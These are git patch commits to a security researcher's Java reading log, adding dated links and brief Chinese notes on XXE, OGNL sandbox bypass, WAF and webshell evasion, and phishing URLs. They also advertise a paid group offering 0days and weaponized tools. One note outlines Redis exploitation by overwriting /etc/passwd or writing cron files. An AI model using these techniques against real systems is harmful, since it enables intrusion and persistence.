[从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 1fc5c76155b9aeb97473377980dc3a810f1a34c4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 19 Jan 2023 11:49:29 +0800 Subject: [PATCH 259/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9768ff0..4d61315 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -255,3 +255,4 @@ + 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** + 2023/01/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** + 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** From 94b68f51ef75f2973710e5f90577f552895ee95c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 19 Jan 2023 21:30:16 +0800 Subject: [PATCH 260/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4d61315..db647b6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -256,3 +256,4 @@ + 2023/01/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** + 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** ++ 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** From b3272af2213f62639a2bca057439f7f19d2969ee Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 19 Jan 2023 23:23:54 +0800 Subject: [PATCH 261/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index db647b6..c0dda1a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -257,3 +257,4 @@ + 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** + 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** ++ 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** From d3a20de2adfd2da8f2b9b9bec716fd7d01134ab2 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 23 Jan 2023 19:52:29 +0800 Subject: [PATCH 262/332] Update README.md --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index e2e39f6..907e11b 100644 --- a/README.md +++ b/README.md @@ -26,6 +26,12 @@ + 2022/10/07 [添加JDK里面的trick](Jdk) 💛 💙 💜 ❤️ 💚 +## 知识星球 +该知识星球主要是分享java相关的安全知识,绝对精华.里面包含未开放的1day和0day等分享或武器化工具一发入魂 + +![image](https://user-images.githubusercontent.com/63966847/214033050-87bdd0f8-4982-4aac-b79d-a5b6d0f107b9.png) + + ## 代学习 From 44384ae543ee83a3e6304345b972046f895d49c8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 29 Jan 2023 15:12:19 +0800 Subject: [PATCH 263/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c0dda1a..9f83a8d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -258,3 +258,4 @@ + 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** + 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** + 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** ++ 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** From 4b605c634c1a23f2164c158a98e9f19dda10e911 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 29 Jan 2023 21:18:09 +0800 Subject: [PATCH 264/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9f83a8d..2f83594 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -259,3 +259,4 @@ + 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** + 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** + 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** ++ 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** From 0437e1595880648d415a00c62d4d5ca3080316c7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 29 Jan 2023 22:49:25 +0800 Subject: [PATCH 265/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2f83594..458b7e4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -260,3 +260,4 @@ + 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** + 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** ++ 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** From d4f3e447859646d735c8f861ea6ab9da39f693d3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 30 Jan 2023 15:23:12 +0800 Subject: [PATCH 266/332] Update Readme.md --- shell/OGNL/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md index b09dfcf..9b83e7d 100644 --- a/shell/OGNL/Readme.md +++ b/shell/OGNL/Readme.md @@ -41,6 +41,9 @@ String bypass_sm_exp = "var str = Java.type('java.lang.String[]').class;" + >参考 >https://www.sec-in.com/article/753 >https://www.mi1k7ea.com/2020/03/16/OGNL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/ +## Bypass + +https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/ ## mybatis 存在${}的ognl 参考2022的d3ctf ezsql From 9ca0f18f5e4982381bb8801c282bb8bf83182282 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 30 Jan 2023 15:54:59 +0800 Subject: [PATCH 267/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 458b7e4..6f2dab2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -261,3 +261,4 @@ + 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** ++ 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) From 0de7647bb752430b676cb3463695a02e22a25709 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 1 Feb 2023 12:04:32 +0800 Subject: [PATCH 268/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6f2dab2..97cb930 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -262,3 +262,4 @@ + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** + 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) ++ 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) From 34024c8050995e60f0eb8d54ac8ef14e5b783284 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 1 Feb 2023 19:14:22 +0800 Subject: [PATCH 269/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 97cb930..bbe8fa6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -262,4 +262,5 @@ + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** + 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) -+ 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) ++ 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) ++ 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) **可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** From 98d47619c28482ef86504e731e4eff8f8c45bc48 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Feb 2023 20:28:03 +0800 Subject: [PATCH 270/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bbe8fa6..20d2377 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -263,4 +263,5 @@ + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** + 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) + 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) -+ 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) **可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** ++ 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) ** 可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** ++ 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) From 8f2c86d4f92990975fbce31449874276bad6310c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 3 Feb 2023 23:34:23 +0800 Subject: [PATCH 271/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 20d2377..cd55399 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -265,3 +265,4 @@ + 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) + 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) ** 可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** + 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) ++ 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** From 01f655987e69a8c767deb43102ad63c3cca9e5bf Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 6 Feb 2023 18:20:00 +0800 Subject: [PATCH 272/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cd55399..1274f69 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -266,3 +266,4 @@ + 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) ** 可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** + 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) + 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** ++ 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** From d66d38939f448a4f316f06cea4756d3455bdc018 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Feb 2023 21:31:54 +0800 Subject: [PATCH 273/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1274f69..bc75483 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -267,3 +267,4 @@ + 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) + 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** + 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** ++ 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** From 62a7791c550314a2750df8d2f7e61dc7df9d4b61 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 10 Feb 2023 13:06:15 +0800 Subject: [PATCH 274/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bc75483..15f4423 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -268,3 +268,4 @@ + 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** + 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** + 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** ++ 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** From fb4d535ca76fe7bf49c67b050c659a5b376ad454 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 10 Feb 2023 21:01:02 +0800 Subject: [PATCH 275/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 15f4423..ea9768f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -269,3 +269,4 @@ + 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** + 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** + 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** ++ 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) From 12a737174f71891b9358c0d1d9be4bd120cf2aeb Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Feb 2023 17:47:26 +0800 Subject: [PATCH 276/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ea9768f..0133fcb 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -270,3 +270,4 @@ + 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** + 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** + 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) ++ 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) From 02f2c95f5bc469d6fccb1a0414cd3a41b9e547c1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 14 Feb 2023 13:05:11 +0800 Subject: [PATCH 277/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0133fcb..b3be6a3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -271,3 +271,4 @@ + 2023/02/10 [json 格式 bypass 